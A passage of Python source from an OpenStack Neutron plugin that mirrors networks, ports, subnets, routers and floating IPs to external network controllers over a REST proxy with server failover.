cfg.CONF.register_opts(restproxy_opts, "RESTPROXY")
router_opts = [
cfg.MultiStrOpt('tenant_default_router_rule', default=['*:any:any:permit'],
help=_("The default router rules installed in new tenant "
"routers. Repeat the config option for each rule. "
"Format is <tenant>:<source>:<destination>:<action>"
" Use an * to specify default for all tenants.")),
cfg.IntOpt('max_router_rules', default=200,
help=_("Maximum number of router rules")),
]
cfg.CONF.register_opts(router_opts, "ROUTER")
nova_opts = [
cfg.StrOpt('vif_type', default='ovs',
help=_("Virtual interface type to configure on "
"Nova compute nodes")),
]
# Each VIF Type can have a list of nova host IDs that are fixed to that type
for i in portbindings.VIF_TYPES:
opt = cfg.ListOpt('node_override_vif_' + i, default=[],
help=_("Nova compute nodes to manually set VIF "
"type to %s") % i)
nova_opts.append(opt)
# Add the vif types for reference later
nova_opts.append(cfg.ListOpt('vif_types', default=portbindings.VIF_TYPES))
cfg.CONF.register_opts(nova_opts, "NOVA")
# The following are used to invoke the API on the external controller
NET_RESOURCE_PATH = "/tenants/%s/networks"
PORT_RESOURCE_PATH = "/tenants/%s/networks/%s/ports"
ROUTER_RESOURCE_PATH = "/tenants/%s/routers"
ROUTER_INTF_OP_PATH = "/tenants/%s/routers/%s/interfaces"
NETWORKS_PATH = "/tenants/%s/networks/%s"
PORTS_PATH = "/tenants/%s/networks/%s/ports/%s"
ATTACHMENT_PATH = "/tenants/%s/networks/%s/ports/%s/attachment"
ROUTERS_PATH = "/tenants/%s/routers/%s"
ROUTER_INTF_PATH = "/tenants/%s/routers/%s/interfaces/%s"
SUCCESS_CODES = range(200, 207)
FAILURE_CODES = [0, 301, 302, 303, 400, 401, 403, 404, 500, 501, 502, 503,
504, 505]
SYNTAX_ERROR_MESSAGE = 'Syntax error in server config file, aborting plugin'
BASE_URI = '/networkService/v1.1'
ORCHESTRATION_SERVICE_ID = 'Neutron v2.0'
METADATA_SERVER_IP = '169.254.169.254'
class RemoteRestError(exceptions.NeutronException):
def __init__(self, message):
if message is None:
message = "None"
self.message = _("Error in REST call to remote network "
"controller") + ": " + message
super(RemoteRestError, self).__init__()
class ServerProxy(object):
"""REST server proxy to a network controller."""
def __init__(self, server, port, ssl, auth, neutron_id, timeout,
base_uri, name):
self.server = server
self.port = port
self.ssl = ssl
self.base_uri = base_uri
self.timeout = timeout
self.name = name
self.success_codes = SUCCESS_CODES
self.auth = None
self.neutron_id = neutron_id
if auth:
self.auth = 'Basic ' + base64.encodestring(auth).strip()
@utils.synchronized('bsn-rest-call', external=True)
def rest_call(self, action, resource, data, headers):
uri = self.base_uri + resource
body = json.dumps(data)
if not headers:
headers = {}
headers['Content-type'] = 'application/json'
headers['Accept'] = 'application/json'
headers['NeutronProxy-Agent'] = self.name
headers['Instance-ID'] = self.neutron_id
headers['Orchestration-Service-ID'] = ORCHESTRATION_SERVICE_ID
if self.auth:
headers['Authorization'] = self.auth
LOG.debug(_("ServerProxy: server=%(server)s, port=%(port)d, "
"ssl=%(ssl)r, action=%(action)s"),
{'server': self.server, 'port': self.port, 'ssl': self.ssl,
'action': action})
LOG.debug(_("ServerProxy: resource=%(resource)s, data=%(data)r, "
"headers=%(headers)r"),
{'resource': resource, 'data': data, 'headers': headers})
conn = None
if self.ssl:
conn = httplib.HTTPSConnection(
self.server, self.port, timeout=self.timeout)
if conn is None:
LOG.error(_('ServerProxy: Could not establish HTTPS '
'connection'))
return 0, None, None, None
else:
conn = httplib.HTTPConnection(
self.server, self.port, timeout=self.timeout)
if conn is None:
LOG.error(_('ServerProxy: Could not establish HTTP '
'connection'))
return 0, None, None, None
try:
conn.request(action, uri, body, headers)
response = conn.getresponse()
respstr = response.read()
respdata = respstr
if response.status in self.success_codes:
try:
respdata = json.loads(respstr)
except ValueError:
# response was not JSON, ignore the exception
pass
ret = (response.status, response.reason, respstr, respdata)
except (socket.timeout, socket.error) as e:
LOG.error(_('ServerProxy: %(action)s failure, %(e)r'),
{'action': action, 'e': e})
ret = 0, None, None, None
conn.close()
LOG.debug(_("ServerProxy: status=%(status)d, reason=%(reason)r, "
"ret=%(ret)s, data=%(data)r"), {'status': ret[0],
'reason': ret[1],
'ret': ret[2],
'data': ret[3]})
return ret
class ServerPool(object):
def __init__(self, servers, ssl, auth, neutron_id, timeout=10,
base_uri='/quantum/v1.0', name='NeutronRestProxy'):
self.base_uri = base_uri
self.timeout = timeout
self.name = name
self.auth = auth
self.ssl = ssl
self.neutron_id = neutron_id
self.servers = []
for server_port in servers:
self.servers.append(self.server_proxy_for(*server_port))
def server_proxy_for(self, server, port):
return ServerProxy(server, port, self.ssl, self.auth, self.neutron_id,
self.timeout, self.base_uri, self.name)
def server_failure(self, resp):
"""Define failure codes as required.
Note: We assume 301-303 is a failure, and try the next server in
the server pool.
"""
return resp[0] in FAILURE_CODES
def action_success(self, resp):
"""Defining success codes as required.
Note: We assume any valid 2xx as being successful response.
"""
return resp[0] in SUCCESS_CODES
def rest_call(self, action, resource, data, headers):
failed_servers = []
while self.servers:
active_server = self.servers[0]
ret = active_server.rest_call(action, resource, data, headers)
if not self.server_failure(ret):
self.servers.extend(failed_servers)
return ret
else:
LOG.error(_('ServerProxy: %(action)s failure for servers: '
'%(server)r'),
{'action': action,
'server': (active_server.server,
active_server.port)})
failed_servers.append(self.servers.pop(0))
# All servers failed, reset server list and try again next time
LOG.error(_('ServerProxy: %(action)s failure for all servers: '
'%(server)r'),
{'action': action,
'server': tuple((s.server,
s.port) for s in failed_servers)})
self.servers.extend(failed_servers)
return (0, None, None, None)
def get(self, resource, data='', headers=None):
return self.rest_call('GET', resource, data, headers)
def put(self, resource, data, headers=None):
return self.rest_call('PUT', resource, data, headers)
def post(self, resource, data, headers=None):
return self.rest_call('POST', resource, data, headers)
def delete(self, resource, data='', headers=None):
return self.rest_call('DELETE', resource, data, headers)
class RpcProxy(dhcp_rpc_base.DhcpRpcCallbackMixin):
RPC_API_VERSION = '1.0'
def create_rpc_dispatcher(self):
return q_rpc.PluginRpcDispatcher([self])
class NeutronRestProxyV2(db_base_plugin_v2.NeutronDbPluginV2,
routerrule_db.RouterRule_db_mixin):
supported_extension_aliases = ["router", "binding", "router_rules"]
def __init__(self, server_timeout=None):
LOG.info(_('NeutronRestProxy: Starting plugin. Version=%s'),
version_string_with_vcs())
# init DB, proxy's persistent store defaults to in-memory sql-lite DB
db.configure_db()
# 'servers' is the list of network controller REST end-points
# (used in order specified till one suceeds, and it is sticky
# till next failure). Use 'server_auth' to encode api-key
servers = cfg.CONF.RESTPROXY.servers
server_auth = cfg.CONF.RESTPROXY.server_auth
server_ssl = cfg.CONF.RESTPROXY.server_ssl
sync_data = cfg.CONF.RESTPROXY.sync_data
neutron_id = cfg.CONF.RESTPROXY.neutron_id
self.add_meta_server_route = cfg.CONF.RESTPROXY.add_meta_server_route
timeout = cfg.CONF.RESTPROXY.server_timeout
if server_timeout is not None:
timeout = server_timeout
# validate config
assert servers is not None, 'Servers not defined. Aborting plugin'
servers = tuple(s.rsplit(':', 1) for s in servers.split(','))
servers = tuple((server, int(port)) for server, port in servers)
assert all(len(s) == 2 for s in servers), SYNTAX_ERROR_MESSAGE
# init network ctrl connections
self.servers = ServerPool(servers, server_ssl, server_auth, neutron_id,
timeout, BASE_URI)
# init dhcp support
self.topic = topics.PLUGIN
self.conn = rpc.create_connection(new=True)
self.callbacks = RpcProxy()
self.dispatcher = self.callbacks.create_rpc_dispatcher()
self.conn.create_consumer(self.topic, self.dispatcher,
fanout=False)
# Consume from all consumers in a thread
self.conn.consume_in_thread()
if sync_data:
self._send_all_data()
self._dhcp_agent_notifier = dhcp_rpc_agent_api.DhcpAgentNotifyAPI()
LOG.debug(_("NeutronRestProxyV2: initialization done"))
def create_network(self, context, network):
"""Create a network.
Network represents an L2 network segment which can have a set of
subnets and ports associated with it.
:param context: neutron api request context
:param network: dictionary describing the network
:returns: a sequence of mappings with the following signature:
{
"id": UUID representing the network.
"name": Human-readable name identifying the network.
"tenant_id": Owner of network. NOTE: only admin user can specify
a tenant_id other than its own.
"admin_state_up": Sets admin state of network.
if down, network does not forward packets.
"status": Indicates whether network is currently operational
(values are "ACTIVE", "DOWN", "BUILD", and "ERROR")
"subnets": Subnets associated with this network.
}
:raises: RemoteRestError
"""
LOG.debug(_("NeutronRestProxyV2: create_network() called"))
self._warn_on_state_status(network['network'])
# Validate args
tenant_id = self._get_tenant_id_for_create(context, network["network"])
session = context.session
with session.begin(subtransactions=True):
# create network in DB
new_net = super(NeutronRestProxyV2, self).create_network(context,
network)
self._process_l3_create(context, new_net, network['network'])
# create network on the network controller
try:
resource = NET_RESOURCE_PATH % tenant_id
mapped_network = self._get_mapped_network_with_subnets(new_net)
data = {
"network": mapped_network
}
ret = self.servers.post(resource, data)
if not self.servers.action_success(ret):
raise RemoteRestError(ret[2])
except RemoteRestError as e:
LOG.error(_("NeutronRestProxyV2:Unable to create remote "
"network: %s"), e.message)
super(NeutronRestProxyV2, self).delete_network(context,
new_net['id'])
raise
# return created network
return new_net
def update_network(self, context, net_id, network):
"""Updates the properties of a particular Virtual Network.
:param context: neutron api request context
:param net_id: uuid of the network to update
:param network: dictionary describing the updates
:returns: a sequence of mappings with the following signature:
{
"id": UUID representing the network.
"name": Human-readable name identifying the network.
"tenant_id": Owner of network. NOTE: only admin user can
specify a tenant_id other than its own.
"admin_state_up": Sets admin state of network.
if down, network does not forward packets.
"status": Indicates whether network is currently operational
(values are "ACTIVE", "DOWN", "BUILD", and "ERROR")
"subnets": Subnets associated with this network.
}
:raises: exceptions.NetworkNotFound
:raises: RemoteRestError
"""
LOG.debug(_("NeutronRestProxyV2.update_network() called"))
self._warn_on_state_status(network['network'])
session = context.session
with session.begin(subtransactions=True):
orig_net = super(NeutronRestProxyV2, self).get_network(context,
net_id)
new_net = super(NeutronRestProxyV2, self).update_network(context,
net_id,
network)
self._process_l3_update(context, new_net, network['network'])
# update network on network controller
try:
self._send_update_network(new_net)
except RemoteRestError as e:
LOG.error(_("NeutronRestProxyV2: Unable to update remote "
"network: %s"), e.message)
# reset network to original state
super(NeutronRestProxyV2, self).update_network(context, id,
orig_net)
raise
# return updated network
return new_net
def delete_network(self, context, net_id):
"""Delete a network.
:param context: neutron api request context
:param id: UUID representing the network to delete.
:returns: None
:raises: exceptions.NetworkInUse
:raises: exceptions.NetworkNotFound
:raises: RemoteRestError
"""
LOG.debug(_("NeutronRestProxyV2: delete_network() called"))
# Validate args
orig_net = super(NeutronRestProxyV2, self).get_network(context, net_id)
tenant_id = orig_net["tenant_id"]
filter = {'network_id': [net_id]}
ports = self.get_ports(context, filters=filter)
# check if there are any tenant owned ports in-use
auto_delete_port_owners = db_base_plugin_v2.AUTO_DELETE_PORT_OWNERS
only_auto_del = all(p['device_owner'] in auto_delete_port_owners
for p in ports)
if not only_auto_del:
raise exceptions.NetworkInUse(net_id=net_id)
# delete from network ctrl. Remote error on delete is ignored
try:
resource = NETWORKS_PATH % (tenant_id, net_id)
ret = self.servers.delete(resource)
if not self.servers.action_success(ret):
raise RemoteRestError(ret[2])
ret_val = super(NeutronRestProxyV2, self).delete_network(context,
net_id)
return ret_val
except RemoteRestError as e:
LOG.error(_("NeutronRestProxyV2: Unable to update remote "
"network: %s"), e.message)
raise
def create_port(self, context, port):
"""Create a port, which is a connection point of a device
(e.g., a VM NIC) to attach to a L2 Neutron network.
:param context: neutron api request context
:param port: dictionary describing the port
:returns:
{
"id": uuid represeting the port.
"network_id": uuid of network.
"tenant_id": tenant_id
"mac_address": mac address to use on this port.
"admin_state_up": Sets admin state of port. if down, port
does not forward packets.
"status": dicates whether port is currently operational
(limit values to "ACTIVE", "DOWN", "BUILD", and "ERROR")
"fixed_ips": list of subnet ID"s and IP addresses to be used on
this port
"device_id": identifies the device (e.g., virtual server) using
this port.
}
:raises: exceptions.NetworkNotFound
:raises: exceptions.StateInvalid
:raises: RemoteRestError
"""
LOG.debug(_("NeutronRestProxyV2: create_port() called"))
# Update DB
port["port"]["admin_state_up"] = False
if (portbindings.HOST_ID in port['port']
and 'device_id' in port['port']):
porttracker_db.put_port_hostid(context, port['port']['device_id'],
port['port'][portbindings.HOST_ID])
new_port = super(NeutronRestProxyV2, self).create_port(context, port)
net = super(NeutronRestProxyV2,
self).get_network(context, new_port["network_id"])
if self.add_meta_server_route:
if new_port['device_owner'] == 'network:dhcp':
destination = METADATA_SERVER_IP + '/32'
self._add_host_route(context, destination, new_port)
# create on networl ctrl
try:
resource = PORT_RESOURCE_PATH % (net["tenant_id"], net["id"])
mapped_port = self._map_state_and_status(new_port)
data = {
"port": mapped_port
}
ret = self.servers.post(resource, data)
if not self.servers.action_success(ret):
raise RemoteRestError(ret[2])
# connect device to network, if present
device_id = port["port"].get("device_id")
if device_id:
self._plug_interface(context,
net["tenant_id"], net["id"],
new_port["id"], device_id)
except RemoteRestError as e:
LOG.error(_("NeutronRestProxyV2: Unable to create remote port: "
"%s"), e.message)
super(NeutronRestProxyV2, self).delete_port(context,
new_port["id"])
raise
# Set port state up and return that port
port_update = {"port": {"admin_state_up": True}}
new_port = super(NeutronRestProxyV2, self).update_port(context,
new_port["id"],
port_update)
return self._extend_port_dict_binding(context, new_port)
def get_port(self, context, id, fields=None):
with context.session.begin(subtransactions=True):
port = super(NeutronRestProxyV2, self).get_port(context, id,
fields)
self._extend_port_dict_binding(context, port)
return self._fields(port, fields)
def get_ports(self, context, filters=None, fields=None):
with context.session.begin(subtransactions=True):
ports = super(NeutronRestProxyV2, self).get_ports(context, filters,
fields)
for port in ports:
self._extend_port_dict_binding(context, port)
return [self._fields(port, fields) for port in ports]
def update_port(self, context, port_id, port):
"""Update values of a port.
:param context: neutron api request context
:param id: UUID representing the port to update.
:param port: dictionary with keys indicating fields to update.
:returns: a mapping sequence with the following signature:
{
"id": uuid represeting the port.
"network_id": uuid of network.
"tenant_id": tenant_id
"mac_address": mac address to use on this port.
"admin_state_up": sets admin state of port. if down, port
does not forward packets.
"status": dicates whether port is currently operational
(limit values to "ACTIVE", "DOWN", "BUILD", and "ERROR")
"fixed_ips": list of subnet ID's and IP addresses to be used on
this port
"device_id": identifies the device (e.g., virtual server) using
this port.
}
:raises: exceptions.StateInvalid
:raises: exceptions.PortNotFound
:raises: RemoteRestError
"""
LOG.debug(_("NeutronRestProxyV2: update_port() called"))
self._warn_on_state_status(port['port'])
# Validate Args
orig_port = super(NeutronRestProxyV2, self).get_port(context, port_id)
# Update DB
new_port = super(NeutronRestProxyV2, self).update_port(context,
port_id, port)
if (portbindings.HOST_ID in port['port']
and 'device_id' in port['port']):
porttracker_db.put_port_hostid(context, port['port']['device_id'],
port['port'][portbindings.HOST_ID])
# update on networl ctrl
try:
resource = PORTS_PATH % (orig_port["tenant_id"],
orig_port["network_id"], port_id)
mapped_port = self._map_state_and_status(new_port)
data = {"port": mapped_port}
ret = self.servers.put(resource, data)
if not self.servers.action_success(ret):
raise RemoteRestError(ret[2])
if new_port.get("device_id") != orig_port.get("device_id"):
if orig_port.get("device_id"):
self._unplug_interface(context, orig_port["tenant_id"],
orig_port["network_id"],
orig_port["id"])
device_id = new_port.get("device_id")
if device_id:
self._plug_interface(context, new_port["tenant_id"],
new_port["network_id"],
new_port["id"], device_id)
except RemoteRestError as e:
LOG.error(_("NeutronRestProxyV2: Unable to create remote port: "
"%s"), e.message)
# reset port to original state
super(NeutronRestProxyV2, self).update_port(context, port_id,
orig_port)
raise
# return new_port
return self._extend_port_dict_binding(context, new_port)
def delete_port(self, context, port_id, l3_port_check=True):
"""Delete a port.
:param context: neutron api request context
:param id: UUID representing the port to delete.
:raises: exceptions.PortInUse
:raises: exceptions.PortNotFound
:raises: exceptions.NetworkNotFound
:raises: RemoteRestError
"""
LOG.debug(_("NeutronRestProxyV2: delete_port() called"))
# if needed, check to see if this is a port owned by
# and l3-router. If so, we should prevent deletion.
if l3_port_check:
self.prevent_l3_port_deletion(context, port_id)
self.disassociate_floatingips(context, port_id)
super(NeutronRestProxyV2, self).delete_port(context, port_id)
def _delete_port(self, context, port_id):
# Delete from DB
port = super(NeutronRestProxyV2, self).get_port(context, port_id)
tenant_id = port['tenant_id']
if tenant_id == '':
net = super(NeutronRestProxyV2,
self).get_network(context, port['network_id'])
tenant_id = net['tenant_id']
# delete from network ctrl. Remote error on delete is ignored
try:
resource = PORTS_PATH % (tenant_id, port["network_id"],
port_id)
ret = self.servers.delete(resource)
if not self.servers.action_success(ret):
raise RemoteRestError(ret[2])
if port.get("device_id"):
self._unplug_interface(context, tenant_id,
port["network_id"], port["id"])
ret_val = super(NeutronRestProxyV2, self)._delete_port(context,
port_id)
return ret_val
except RemoteRestError as e:
LOG.error(_("NeutronRestProxyV2: Unable to update remote port: "
"%s"), e.message)
raise
def _plug_interface(self, context, tenant_id, net_id, port_id,
remote_interface_id):
"""Plug remote interface to the network.
Attaches a remote interface to the specified port on the specified
Virtual Network.
:returns: None
:raises: exceptions.NetworkNotFound
:raises: exceptions.PortNotFound
:raises: RemoteRestError
"""
LOG.debug(_("NeutronRestProxyV2: _plug_interface() called"))
# update attachment on network controller
try:
port = super(NeutronRestProxyV2, self).get_port(context, port_id)
mac = port["mac_address"]
if mac is not None:
resource = ATTACHMENT_PATH % (tenant_id, net_id, port_id)
data = {"attachment":
{"id": remote_interface_id,
"mac": mac,
}
}
ret = self.servers.put(resource, data)
if not self.servers.action_success(ret):
raise RemoteRestError(ret[2])
except RemoteRestError as e:
LOG.error(_("NeutronRestProxyV2:Unable to update remote network: "
"%s"), e.message)
raise
def _unplug_interface(self, context, tenant_id, net_id, port_id):
"""Detach interface from the network controller.
Detaches a remote interface from the specified port on the network
controller.
:returns: None
:raises: RemoteRestError
"""
LOG.debug(_("NeutronRestProxyV2: _unplug_interface() called"))
# delete from network ctrl. Remote error on delete is ignored
try:
resource = ATTACHMENT_PATH % (tenant_id, net_id, port_id)
ret = self.servers.delete(resource)
if not self.servers.action_success(ret):
raise RemoteRestError(ret[2])
except RemoteRestError as e:
LOG.error(_("NeutronRestProxyV2: Unable to update remote port: "
"%s"), e.message)
def create_subnet(self, context, subnet):
LOG.debug(_("NeutronRestProxyV2: create_subnet() called"))
self._warn_on_state_status(subnet['subnet'])
# create subnet in DB
new_subnet = super(NeutronRestProxyV2, self).create_subnet(context,
subnet)
net_id = new_subnet['network_id']
orig_net = super(NeutronRestProxyV2, self).get_network(context,
net_id)
# update network on network controller
try:
self._send_update_network(orig_net)
except RemoteRestError:
# rollback creation of subnet
super(NeutronRestProxyV2, self).delete_subnet(context,
subnet['id'])
raise
return new_subnet
def update_subnet(self, context, id, subnet):
LOG.debug(_("NeutronRestProxyV2: update_subnet() called"))
self._warn_on_state_status(subnet['subnet'])
orig_subnet = super(NeutronRestProxyV2, self)._get_subnet(context, id)
# update subnet in DB
new_subnet = super(NeutronRestProxyV2, self).update_subnet(context, id,
subnet)
net_id = new_subnet['network_id']
orig_net = super(NeutronRestProxyV2, self).get_network(context,
net_id)
# update network on network controller
try:
self._send_update_network(orig_net)
except RemoteRestError:
# rollback updation of subnet
super(NeutronRestProxyV2, self).update_subnet(context, id,
orig_subnet)
raise
return new_subnet
def delete_subnet(self, context, id):
LOG.debug(_("NeutronRestProxyV2: delete_subnet() called"))
orig_subnet = super(NeutronRestProxyV2, self).get_subnet(context, id)
net_id = orig_subnet['network_id']
# delete subnet in DB
super(NeutronRestProxyV2, self).delete_subnet(context, id)
orig_net = super(NeutronRestProxyV2, self).get_network(context,
net_id)
# update network on network controller
try:
self._send_update_network(orig_net)
except RemoteRestError:
# TODO(Sumit): rollback deletion of subnet
raise
def _get_tenant_default_router_rules(self, tenant):
rules = cfg.CONF.ROUTER.tenant_default_router_rule
defaultset = []
tenantset = []
for rule in rules:
items = rule.split(':')
if len(items) == 5:
(tenantid, source, destination, action, nexthops) = items
elif len(items) == 4:
(tenantid, source, destination, action) = items
nexthops = ''
else:
continue
parsedrule = {'source': source,
'destination': destination, 'action': action,
'nexthops': nexthops.split(',')}
if parsedrule['nexthops'][0] == '':
parsedrule['nexthops'] = []
if tenantid == '*':
defaultset.append(parsedrule)
if tenantid == tenant:
tenantset.append(parsedrule)
if tenantset:
return tenantset
return defaultset
def create_router(self, context, router):
LOG.debug(_("NeutronRestProxyV2: create_router() called"))
self._warn_on_state_status(router['router'])
tenant_id = self._get_tenant_id_for_create(context, router["router"])
# set default router rules
rules = self._get_tenant_default_router_rules(tenant_id)
router['router']['router_rules'] = rules
# create router in DB
new_router = super(NeutronRestProxyV2, self).create_router(context,
router)
# create router on the network controller
try:
resource = ROUTER_RESOURCE_PATH % tenant_id
mapped_router = self._map_state_and_status(new_router)
data = {
"router": mapped_router
}
ret = self.servers.post(resource, data)
if not self.servers.action_success(ret):
raise RemoteRestError(ret[2])
except RemoteRestError as e:
LOG.error(_("NeutronRestProxyV2: Unable to create remote router: "
"%s"), e.message)
super(NeutronRestProxyV2, self).delete_router(context,
new_router['id'])
raise
# return created router
return new_router
def update_router(self, context, router_id, router):
LOG.debug(_("NeutronRestProxyV2.update_router() called"))
self._warn_on_state_status(router['router'])
orig_router = super(NeutronRestProxyV2, self).get_router(context,
router_id)
tenant_id = orig_router["tenant_id"]
new_router = super(NeutronRestProxyV2, self).update_router(context,
router_id,
router)
# update router on network controller
try:
resource = ROUTERS_PATH % (tenant_id, router_id)
mapped_router = self._map_state_and_status(new_router)
data = {
"router": mapped_router
}
ret = self.servers.put(resource, data)
if not self.servers.action_success(ret):
raise RemoteRestError(ret[2])
except RemoteRestError as e:
LOG.error(_("NeutronRestProxyV2: Unable to update remote router: "
"%s"), e.message)
# reset router to original state
super(NeutronRestProxyV2, self).update_router(context,
router_id,
orig_router)
raise
# return updated router
return new_router
def delete_router(self, context, router_id):
LOG.debug(_("NeutronRestProxyV2: delete_router() called"))
with context.session.begin(subtransactions=True):
orig_router = self._get_router(context, router_id)
tenant_id = orig_router["tenant_id"]
# Ensure that the router is not used
router_filter = {'router_id': [router_id]}
fips = self.get_floatingips_count(context.elevated(),
filters=router_filter)
if fips:
raise l3.RouterInUse(router_id=router_id)
device_owner = l3_db.DEVICE_OWNER_ROUTER_INTF
device_filter = {'device_id': [router_id],
'device_owner': [device_owner]}
ports = self.get_ports_count(context.elevated(),
filters=device_filter)
if ports:
raise l3.RouterInUse(router_id=router_id)
# delete from network ctrl. Remote error on delete is ignored
try:
resource = ROUTERS_PATH % (tenant_id, router_id)
ret = self.servers.delete(resource)
if not self.servers.action_success(ret):
raise RemoteRestError(ret[2])
ret_val = super(NeutronRestProxyV2, self).delete_router(context,
router_id)
return ret_val
except RemoteRestError as e:
LOG.error(_("NeutronRestProxyV2: Unable to delete remote router: "
"%s"), e.message)
raise
def add_router_interface(self, context, router_id, interface_info):
LOG.debug(_("NeutronRestProxyV2: add_router_interface() called"))
# Validate args
router = self._get_router(context, router_id)
tenant_id = router['tenant_id']
# create interface in DB
new_interface_info = super(NeutronRestProxyV2,
self).add_router_interface(context,
router_id,
interface_info)
port = self._get_port(context, new_interface_info['port_id'])
net_id = port['network_id']
subnet_id = new_interface_info['subnet_id']
# we will use the port's network id as interface's id
interface_id = net_id
intf_details = self._get_router_intf_details(context,
interface_id,
subnet_id)
# create interface on the network controller
try:
resource = ROUTER_INTF_OP_PATH % (tenant_id, router_id)
data = {"interface": intf_details}
ret = self.servers.post(resource, data)
if not self.servers.action_success(ret):
raise RemoteRestError(ret[2])
except RemoteRestError as e:
LOG.error(_("NeutronRestProxyV2: Unable to create interface: "
"%s"), e.message)
super(NeutronRestProxyV2,
self).remove_router_interface(context, router_id,
interface_info)
raise
return new_interface_info
def remove_router_interface(self, context, router_id, interface_info):
LOG.debug(_("NeutronRestProxyV2: remove_router_interface() called"))
# Validate args
router = self._get_router(context, router_id)
tenant_id = router['tenant_id']
# we will first get the interface identifier before deleting in the DB
if not interface_info:
msg = "Either subnet_id or port_id must be specified"
raise exceptions.BadRequest(resource='router', msg=msg)
if 'port_id' in interface_info:
port = self._get_port(context, interface_info['port_id'])
interface_id = port['network_id']
elif 'subnet_id' in interface_info:
subnet = self._get_subnet(context, interface_info['subnet_id'])
interface_id = subnet['network_id']
else:
msg = "Either subnet_id or port_id must be specified"
raise exceptions.BadRequest(resource='router', msg=msg)
# remove router in DB
del_intf_info = super(NeutronRestProxyV2,
self).remove_router_interface(context,
router_id,
interface_info)
# create router on the network controller
try:
resource = ROUTER_INTF_PATH % (tenant_id, router_id, interface_id)
ret = self.servers.delete(resource)
if not self.servers.action_success(ret):
raise RemoteRestError(ret[2])
except RemoteRestError as e:
LOG.error(_("NeutronRestProxyV2:Unable to delete remote intf: "
"%s"), e.message)
raise
# return new interface
return del_intf_info
def create_floatingip(self, context, floatingip):
LOG.debug(_("NeutronRestProxyV2: create_floatingip() called"))
# create floatingip in DB
new_fl_ip = super(NeutronRestProxyV2,
self).create_floatingip(context, floatingip)
net_id = new_fl_ip['floating_network_id']
orig_net = super(NeutronRestProxyV2, self).get_network(context,
net_id)
# create floatingip on the network controller
try:
self._send_update_network(orig_net)
except RemoteRestError as e:
LOG.error(_("NeutronRestProxyV2: Unable to create remote "
"floatin IP: %s"), e.message)
super(NeutronRestProxyV2, self).delete_floatingip(context,
floatingip)
raise
# return created floating IP
return new_fl_ip
def update_floatingip(self, context, id, floatingip):
LOG.debug(_("NeutronRestProxyV2: update_floatingip() called"))
orig_fl_ip = super(NeutronRestProxyV2, self).get_floatingip(context,
id)
# update floatingip in DB
new_fl_ip = super(NeutronRestProxyV2,
self).update_floatingip(context, id, floatingip)
net_id = new_fl_ip['floating_network_id']
orig_net = super(NeutronRestProxyV2, self).get_network(context,
net_id)
# update network on network controller
try:
self._send_update_network(orig_net)
except RemoteRestError:
# rollback updation of subnet
super(NeutronRestProxyV2, self).update_floatingip(context, id,
orig_fl_ip)
raise
return new_fl_ip
def delete_floatingip(self, context, id):
LOG.debug(_("NeutronRestProxyV2: delete_floatingip() called"))
orig_fl_ip = super(NeutronRestProxyV2, self).get_floatingip(context,
id)
# delete floating IP in DB
net_id = orig_fl_ip['floating_network_id']
super(NeutronRestProxyV2, self).delete_floatingip(context, id)
orig_net = super(NeutronRestProxyV2, self).get_network(context,
net_id)
# update network on network controller
try:
self._send_update_network(orig_net)
except RemoteRestError:
# TODO(Sumit): rollback deletion of floating IP
raise
def _send_all_data(self):
"""Pushes all data to network ctrl (networks/ports, ports/attachments).
This gives the controller an option to re-sync it's persistent store
with neutron's current view of that data.
"""
admin_context = qcontext.get_admin_context()
networks = []
routers = []
all_networks = super(NeutronRestProxyV2,
self).get_networks(admin_context) or []
for net in all_networks:
mapped_network = self._get_mapped_network_with_subnets(net)
net_fl_ips = self._get_network_with_floatingips(mapped_network)
ports = []
net_filter = {'network_id': [net.get('id')]}
net_ports = super(NeutronRestProxyV2,
self).get_ports(admin_context,
filters=net_filter) or []
for port in net_ports:
mapped_port = self._map_state_and_status(port)
mapped_port['attachment'] = {
'id': port.get('device_id'),
'mac': port.get('mac_address'),
}
ports.append(mapped_port)
net_fl_ips['ports'] = ports
networks.append(net_fl_ips)
all_routers = super(NeutronRestProxyV2,
self).get_routers(admin_context) or []
for router in all_routers:
interfaces = []
mapped_router = self._map_state_and_status(router)
router_filter = {
'device_owner': ["network:router_interface"],
'device_id': [router.get('id')]
}
router_ports = super(NeutronRestProxyV2,
self).get_ports(admin_context,
filters=router_filter) or []
for port in router_ports:
net_id = port.get('network_id')
subnet_id = port['fixed_ips'][0]['subnet_id']
intf_details = self._get_router_intf_details(admin_context,
net_id,
subnet_id)
interfaces.append(intf_details)
mapped_router['interfaces'] = interfaces
routers.append(mapped_router)
try:
resource = '/topology'
data = {
'networks': networks,
'routers': routers,
}
ret = self.servers.put(resource, data)
if not self.servers.action_success(ret):
raise RemoteRestError(ret[2])
return ret
except RemoteRestError as e:
LOG.error(_('NeutronRestProxy: Unable to update remote '
'topology: %s'), e.message)
raise
def _add_host_route(self, context, destination, port):
subnet = {}
for fixed_ip in port['fixed_ips']:
subnet_id = fixed_ip['subnet_id']
nexthop = fixed_ip['ip_address']
subnet['host_routes'] = [{'destination': destination,
'nexthop': nexthop}]
updated_subnet = self.update_subnet(context,
subnet_id,
{'subnet': subnet})
payload = {'subnet': updated_subnet}
self._dhcp_agent_notifier.notify(context, payload,
'subnet.update.end')
LOG.debug("Adding host route: ")
LOG.debug("destination:%s nexthop:%s" % (destination,
nexthop))
def _get_network_with_floatingips(self, network):
admin_context = qcontext.get_admin_context()
net_id = network['id']
net_filter = {'floating_network_id': [net_id]}
fl_ips = super(NeutronRestProxyV2,
self).get_floatingips(admin_context,
filters=net_filter) or []
network['floatingips'] = fl_ips
return network
def _get_all_subnets_json_for_network(self, net_id):
admin_context = qcontext.get_admin_context()
subnets = self._get_subnets_by_network(admin_context,
net_id)
subnets_details = []
if subnets:
for subnet in subnets:
subnet_dict = self._make_subnet_dict(subnet)
mapped_subnet = self._map_state_and_status(subnet_dict)
subnets_details.append(mapped_subnet)
return subnets_details
def _get_mapped_network_with_subnets(self, network):
admin_context = qcontext.get_admin_context()
network = self._map_state_and_status(network)
subnets = self._get_all_subnets_json_for_network(network['id'])
network['subnets'] = subnets
for subnet in (subnets or []):
if subnet['gateway_ip']:
# FIX: For backward compatibility with wire protocol
network['gateway'] = subnet['gateway_ip']
break
else:
network['gateway'] = ''
network[l3.EXTERNAL] = self._network_is_external(admin_context,
network['id'])
return network
def _send_update_network(self, network):
net_id = network['id']
tenant_id = network['tenant_id']
# update network on network controller
try:
resource = NETWORKS_PATH % (tenant_id, net_id)
mapped_network = self._get_mapped_network_with_subnets(network)
net_fl_ips = self._get_network_with_floatingips(mapped_network)
data = {
"network": net_fl_ips,
}
ret = self.servers.put(resource, data)
if not self.servers.action_success(ret):
